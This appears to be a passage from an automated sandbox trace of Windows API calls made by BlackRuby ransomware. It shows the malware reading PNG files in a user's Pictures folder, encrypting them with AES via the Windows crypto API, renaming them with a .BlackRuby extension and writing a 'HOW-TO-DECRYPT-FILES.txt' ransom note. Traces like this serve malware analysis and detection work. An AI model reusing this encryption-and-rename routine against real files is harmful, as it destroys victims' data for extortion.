FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.387] GetLastError () returned 0x12 [0061.387] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.387] GetLastError () returned 0x12 [0061.388] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0061.388] GetLastError () returned 0x12 [0061.388] FindClose (in: hFindFile=0x360f20 | out: hFindFile=0x360f20) returned 1 [0061.388] SetErrorMode (uMode=0x0) returned 0x1 [0061.388] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\gzp OsY8.png", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\gzp OsY8.png", lpFilePart=0x0) returned 0x43 [0061.388] GetLastError () returned 0x12 [0061.388] SetErrorMode (uMode=0x1) returned 0x0 [0061.388] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\gzp OsY8.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\gzp osy8.png"), fInfoLevelId=0x0, lpFileInformation=0x1d0dc74 | out: lpFileInformation=0x1d0dc74*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7337c400, ftCreationTime.dwHighDateTime=0x1d35660, ftLastAccessTime.dwLowDateTime=0x85362c60, ftLastAccessTime.dwHighDateTime=0x1d34dd1, ftLastWriteTime.dwLowDateTime=0x85362c60, ftLastWriteTime.dwHighDateTime=0x1d34dd1, nFileSizeHigh=0x0, nFileSizeLow=0x283a)) returned 1 [0061.388] GetLastError () returned 0x12 [0061.388] SetErrorMode (uMode=0x0) returned 0x1 [0061.388] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\gzp OsY8.png", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\gzp OsY8.png", lpFilePart=0x0) returned 0x43 [0061.388] GetLastError () returned 0x12 [0061.388] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\gzp OsY8.png", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\gzp OsY8.png", lpFilePart=0x0) returned 0x43 [0061.388] GetLastError () returned 0x12 [0061.388] SetErrorMode (uMode=0x1) returned 0x0 [0061.388] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\gzp OsY8.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\gzp osy8.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.389] GetLastError () returned 0x0 [0061.389] GetFileType (hFile=0x258) returned 0x1 [0061.389] SetErrorMode (uMode=0x0) returned 0x1 [0061.389] GetFileType (hFile=0x258) returned 0x1 [0061.389] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x283a [0061.389] GetLastError () returned 0x0 [0061.389] ReadFile (in: hFile=0x258, lpBuffer=0x1d0f954, nNumberOfBytesToRead=0x283a, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1d0f954*, lpNumberOfBytesRead=0x18ecac*=0x283a, lpOverlapped=0x0) returned 1 [0061.390] GetLastError () returned 0x0 [0061.390] CloseHandle (hObject=0x258) returned 1 [0061.390] GetLastError () returned 0x0 [0061.390] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\gzp OsY8.png", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\gzp OsY8.png", lpFilePart=0x0) returned 0x43 [0061.390] GetLastError () returned 0x0 [0061.390] SetErrorMode (uMode=0x1) returned 0x0 [0061.390] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\gzp OsY8.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\gzp osy8.png"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7337c400, ftCreationTime.dwHighDateTime=0x1d35660, ftLastAccessTime.dwLowDateTime=0x85362c60, ftLastAccessTime.dwHighDateTime=0x1d34dd1, ftLastWriteTime.dwLowDateTime=0x85362c60, ftLastWriteTime.dwHighDateTime=0x1d34dd1, nFileSizeHigh=0x0, nFileSizeLow=0x283a)) returned 1 [0061.390] GetLastError () returned 0x0 [0061.390] SetErrorMode (uMode=0x0) returned 0x1 [0061.390] CryptAcquireContextW (in: phProv=0x18ec74, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec74*=0x37c4e8) returned 1 [0061.390] GetLastError () returned 0x0 [0061.427] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1b725b4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360a20) returned 1 [0061.427] GetLastError () returned 0x0 [0061.427] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.427] GetLastError () returned 0x0 [0061.432] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.432] GetLastError () returned 0x0 [0061.432] CryptDuplicateKey (in: hKey=0x360a20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360ee0) returned 1 [0061.432] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.432] GetLastError () returned 0x0 [0061.432] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x4, pbData=0x1b9f600*=0x1, dwFlags=0x0) returned 1 [0061.432] GetLastError () returned 0x0 [0061.432] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x1, pbData=0x1b9f5cc, dwFlags=0x0) returned 1 [0061.432] GetLastError () returned 0x0 [0061.432] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b9f648*, pdwDataLen=0x18ec9c*=0x2930, dwBufLen=0x2930 | out: pbData=0x1b9f648*, pdwDataLen=0x18ec9c*=0x2930) returned 1 [0061.432] GetLastError () returned 0x0 [0061.432] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ba48d4*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1ba48d4*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0061.433] GetLastError () returned 0x0 [0061.433] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1ba4904*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1ba4904*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0061.433] GetLastError () returned 0x0 [0061.433] CryptDestroyKey (hKey=0x360a20) returned 1 [0061.433] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0061.433] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0061.433] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\gzp OsY8.png", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\gzp OsY8.png", lpFilePart=0x0) returned 0x43 [0061.433] GetLastError () returned 0x0 [0061.433] SetErrorMode (uMode=0x1) returned 0x0 [0061.433] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\gzp OsY8.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\gzp osy8.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.434] GetLastError () returned 0xb7 [0061.434] GetFileType (hFile=0x258) returned 0x1 [0061.434] SetErrorMode (uMode=0x0) returned 0x1 [0061.434] GetFileType (hFile=0x258) returned 0x1 [0061.435] CloseHandle (hObject=0x258) returned 1 [0061.435] GetLastError () returned 0xb7 [0061.435] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\gzp OsY8.png", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\gzp OsY8.png", lpFilePart=0x0) returned 0x43 [0061.435] GetLastError () returned 0xb7 [0061.435] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Encrypted_PTHXnCO5YHYguM53tOcsaTeLLUBToElVPa0hMgDi.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Encrypted_PTHXnCO5YHYguM53tOcsaTeLLUBToElVPa0hMgDi.BlackRuby", lpFilePart=0x0) returned 0x73 [0061.435] GetLastError () returned 0xb7 [0061.435] SetErrorMode (uMode=0x1) returned 0x0 [0061.435] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\gzp OsY8.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\gzp osy8.png"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7337c400, ftCreationTime.dwHighDateTime=0x1d35660, ftLastAccessTime.dwLowDateTime=0x85362c60, ftLastAccessTime.dwHighDateTime=0x1d34dd1, ftLastWriteTime.dwLowDateTime=0x2cceb6c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x2940)) returned 1 [0061.435] GetLastError () returned 0xb7 [0061.435] SetErrorMode (uMode=0x0) returned 0x1 [0061.436] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\gzp OsY8.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\gzp osy8.png"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Encrypted_PTHXnCO5YHYguM53tOcsaTeLLUBToElVPa0hMgDi.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\encrypted_pthxnco5yhygum53tocsatellubtoelvpa0hmgdi.blackruby")) returned 1 [0061.436] GetLastError () returned 0xb7 [0061.437] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x4f [0061.437] GetLastError () returned 0xb7 [0061.437] SetErrorMode (uMode=0x1) returned 0x0 [0061.437] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.437] GetLastError () returned 0x0 [0061.437] GetFileType (hFile=0x258) returned 0x1 [0061.437] SetErrorMode (uMode=0x0) returned 0x1 [0061.437] GetFileType (hFile=0x258) returned 0x1 [0061.438] CloseHandle (hObject=0x258) returned 1 [0061.438] GetLastError () returned 0x0 [0061.438] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e888, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x4f [0061.438] GetLastError () returned 0x0 [0061.438] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0061.439] GetLastError () returned 0x0 [0061.439] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\hKxR 4lpmC86k.png", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\hKxR 4lpmC86k.png", lpFilePart=0x0) returned 0x48 [0061.439] GetLastError () returned 0x0 [0061.439] SetErrorMode (uMode=0x1) returned 0x0 [0061.439] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\hKxR 4lpmC86k.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\hkxr 4lpmc86k.png"), fInfoLevelId=0x0, lpFileInformation=0x1bc9420 | out: lpFileInformation=0x1bc9420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f4fb680, ftCreationTime.dwHighDateTime=0x1d34a89, ftLastAccessTime.dwLowDateTime=0x2909b000, ftLastAccessTime.dwHighDateTime=0x1d355a2, ftLastWriteTime.dwLowDateTime=0x2909b000, ftLastWriteTime.dwHighDateTime=0x1d355a2, nFileSizeHigh=0x0, nFileSizeLow=0x1796f)) returned 1 [0061.439] GetLastError () returned 0x0 [0061.439] SetErrorMode (uMode=0x0) returned 0x1 [0061.439] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\hKxR 4lpmC86k.png", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\hKxR 4lpmC86k.png", lpFilePart=0x0) returned 0x48 [0061.439] GetLastError () returned 0x0 [0061.439] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\hKxR 4lpmC86k.png", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\hKxR 4lpmC86k.png", lpFilePart=0x0) returned 0x48 [0061.439] GetLastError () returned 0x0 [0061.439] SetErrorMode (uMode=0x1) returned 0x0 [0061.440] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\hKxR 4lpmC86k.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\hkxr 4lpmc86k.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.440] GetLastError () returned 0x0 [0061.440] GetFileType (hFile=0x258) returned 0x1 [0061.440] SetErrorMode (uMode=0x0) returned 0x1 [0061.440] GetFileType (hFile=0x258) returned 0x1 [0061.440] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x1796f [0061.440] GetLastError () returned 0x0 [0061.441] ReadFile (in: hFile=0x258, lpBuffer=0x2c84380, nNumberOfBytesToRead=0x1796f, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x2c84380*, lpNumberOfBytesRead=0x18ecac*=0x1796f, lpOverlapped=0x0) returned 1 [0061.441] GetLastError () returned 0x0 [0061.442] CloseHandle (hObject=0x258) returned 1 [0061.442] GetLastError () returned 0x0 [0061.442] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\hKxR 4lpmC86k.png", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\hKxR 4lpmC86k.png", lpFilePart=0x0) returned 0x48 [0061.442] GetLastError () returned 0x0 [0061.442] SetErrorMode (uMode=0x1) returned 0x0 [0061.442] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\hKxR 4lpmC86k.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\hkxr 4lpmc86k.png"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f4fb680, ftCreationTime.dwHighDateTime=0x1d34a89, ftLastAccessTime.dwLowDateTime=0x2909b000, ftLastAccessTime.dwHighDateTime=0x1d355a2, ftLastWriteTime.dwLowDateTime=0x2909b000, ftLastWriteTime.dwHighDateTime=0x1d355a2, nFileSizeHigh=0x0, nFileSizeLow=0x1796f)) returned 1 [0061.442] GetLastError () returned 0x0 [0061.443] SetErrorMode (uMode=0x0) returned 0x1 [0061.443] CryptAcquireContextW (in: phProv=0x18ec74, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec74*=0x37c818) returned 1 [0061.443] GetLastError () returned 0x0 [0061.479] CryptImportKey (in: hProv=0x37c818, pbData=0x1c25544, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360b60) returned 1 [0061.479] GetLastError () returned 0x0 [0061.479] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.479] GetLastError () returned 0x0 [0061.484] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.484] GetLastError () returned 0x0 [0061.484] CryptDuplicateKey (in: hKey=0x360b60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360e60) returned 1 [0061.484] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.484] GetLastError () returned 0x0 [0061.484] CryptSetKeyParam (hKey=0x360e60, dwParam=0x4, pbData=0x1c52590*=0x1, dwFlags=0x0) returned 1 [0061.484] GetLastError () returned 0x0 [0061.484] CryptSetKeyParam (hKey=0x360e60, dwParam=0x1, pbData=0x1c5255c, dwFlags=0x0) returned 1 [0061.484] GetLastError () returned 0x0 [0061.485] CryptEncrypt (in: hKey=0x360e60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb37a0*, pdwDataLen=0x18ec9c*=0x17a60, dwBufLen=0x17a60 | out: pbData=0x2cb37a0*, pdwDataLen=0x18ec9c*=0x17a60) returned 1 [0061.485] GetLastError () returned 0x0 [0061.486] CryptEncrypt (in: hKey=0x360e60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c525ec*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1c525ec*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0061.486] GetLastError () returned 0x0 [0061.486] CryptEncrypt (in: hKey=0x360e60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c5261c*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1c5261c*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0061.486] GetLastError () returned 0x0 [0061.487] CryptDestroyKey (hKey=0x360b60) returned 1 [0061.487] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.487] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.487] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\hKxR 4lpmC86k.png", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\hKxR 4lpmC86k.png", lpFilePart=0x0) returned 0x48 [0061.487] GetLastError () returned 0x0 [0061.487] SetErrorMode (uMode=0x1) returned 0x0 [0061.487] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\hKxR 4lpmC86k.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\hkxr 4lpmc86k.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.489] GetLastError () returned 0xb7 [0061.489] GetFileType (hFile=0x258) returned 0x1 [0061.489] SetErrorMode (uMode=0x0) returned 0x1 [0061.489] GetFileType (hFile=0x258) returned 0x1 [0061.491] CloseHandle (hObject=0x258) returned 1 [0061.491] GetLastError () returned 0xb7 [0061.491] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\hKxR 4lpmC86k.png", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\hKxR 4lpmC86k.png", lpFilePart=0x0) returned 0x48 [0061.491] GetLastError () returned 0xb7 [0061.491] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Encrypted_uWjzqQ1rnhkzhSPWx61F39fWreDsYUMqzZssITz.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Encrypted_uWjzqQ1rnhkzhSPWx61F39fWreDsYUMqzZssITz.BlackRuby", lpFilePart=0x0) returned 0x72 [0061.491] GetLastError () returned 0xb7 [0061.491] SetErrorMode (uMode=0x1) returned 0x0 [0061.491] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\hKxR 4lpmC86k.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\hkxr 4lpmc86k.png"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f4fb680, ftCreationTime.dwHighDateTime=0x1d34a89, ftLastAccessTime.dwLowDateTime=0x2909b000, ftLastAccessTime.dwHighDateTime=0x1d355a2, ftLastWriteTime.dwLowDateTime=0x2cd83c40, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x17a70)) returned 1 [0061.491] GetLastError () returned 0xb7 [0061.491] SetErrorMode (uMode=0x0) returned 0x1 [0061.491] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\hKxR 4lpmC86k.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\hkxr 4lpmc86k.png"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Encrypted_uWjzqQ1rnhkzhSPWx61F39fWreDsYUMqzZssITz.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\encrypted_uwjzqq1rnhkzhspwx61f39fwredsyumqzzssitz.blackruby")) returned 1 [0061.492] GetLastError () returned 0xb7 [0061.492] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x4f [0061.492] GetLastError () returned 0xb7 [0061.492] SetErrorMode (uMode=0x1) returned 0x0 [0061.492] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0061.492] GetLastError () returned 0x5 [0061.493] SetErrorMode (uMode=0x0) returned 0x1 [0061.493] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\k-PS7BfWKSle.png", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\k-PS7BfWKSle.png", lpFilePart=0x0) returned 0x47 [0061.493] GetLastError () returned 0x5 [0061.493] SetErrorMode (uMode=0x1) returned 0x0 [0061.493] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\k-PS7BfWKSle.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\k-ps7bfwksle.png"), fInfoLevelId=0x0, lpFileInformation=0x1c6faa4 | out: lpFileInformation=0x1c6faa4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20b09680, ftCreationTime.dwHighDateTime=0x1d34a71, ftLastAccessTime.dwLowDateTime=0xef9d5c20, ftLastAccessTime.dwHighDateTime=0x1d34eb9, ftLastWriteTime.dwLowDateTime=0xef9d5c20, ftLastWriteTime.dwHighDateTime=0x1d34eb9, nFileSizeHigh=0x0, nFileSizeLow=0x7833)) returned 1 [0061.494] GetLastError () returned 0x5 [0061.494] SetErrorMode (uMode=0x0) returned 0x1 [0061.494] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\k-PS7BfWKSle.png", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\k-PS7BfWKSle.png", lpFilePart=0x0) returned 0x47 [0061.494] GetLastError () returned 0x5 [0061.494] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\k-PS7BfWKSle.png", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\k-PS7BfWKSle.png", lpFilePart=0x0) returned 0x47 [0061.494] GetLastError () returned 0x5 [0061.494] SetErrorMode 